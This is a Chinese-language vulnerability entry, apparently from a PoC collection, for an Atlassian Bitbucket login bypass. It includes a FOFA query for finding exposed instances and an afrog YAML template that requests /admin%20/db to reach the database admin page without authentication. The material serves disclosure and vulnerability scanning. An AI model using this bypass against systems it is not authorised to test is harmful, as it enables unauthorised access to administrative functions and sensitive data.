atlassian-bitbucket-loginbypass: Atlassian Bitbucket 登录绕过漏洞

日期: 2025-09-01 | 影响软件: Atlassian Bitbucket | POC: 已公开

漏洞描述

此错误已修复并部署在 Bitbucket Server > 4.8 上。Bitbucket 由 Atlassian 团队开发。其中出现了一个通过 %20 绕过权限的漏洞,导致任意用户可获取敏感数据 fofa-query: title="Log in - Bitbucket"

PoC代码[已公开]

id: atlassian-bitbucket-loginbypass

info:
  name: Atlassian Bitbucket 登录绕过漏洞
  author: daffainfo
  severity: medium
  verified: true
  description: |
    此错误已修复并部署在 Bitbucket Server > 4.8 上。Bitbucket 由 Atlassian 团队开发。其中出现了一个通过 %20 绕过权限的漏洞,导致任意用户可获取敏感数据
    fofa-query: title="Log in - Bitbucket"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md

rules:
  r0:
    request:
      method: GET
      path: /admin%20/db
    expression: response.status == 200 && response.body.bcontains(b'<h2>Database</h2>') && response.body.bcontains(b'Migrate database</a>')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/atlassian-bitbucket-loginbypass.yaml

相关漏洞推荐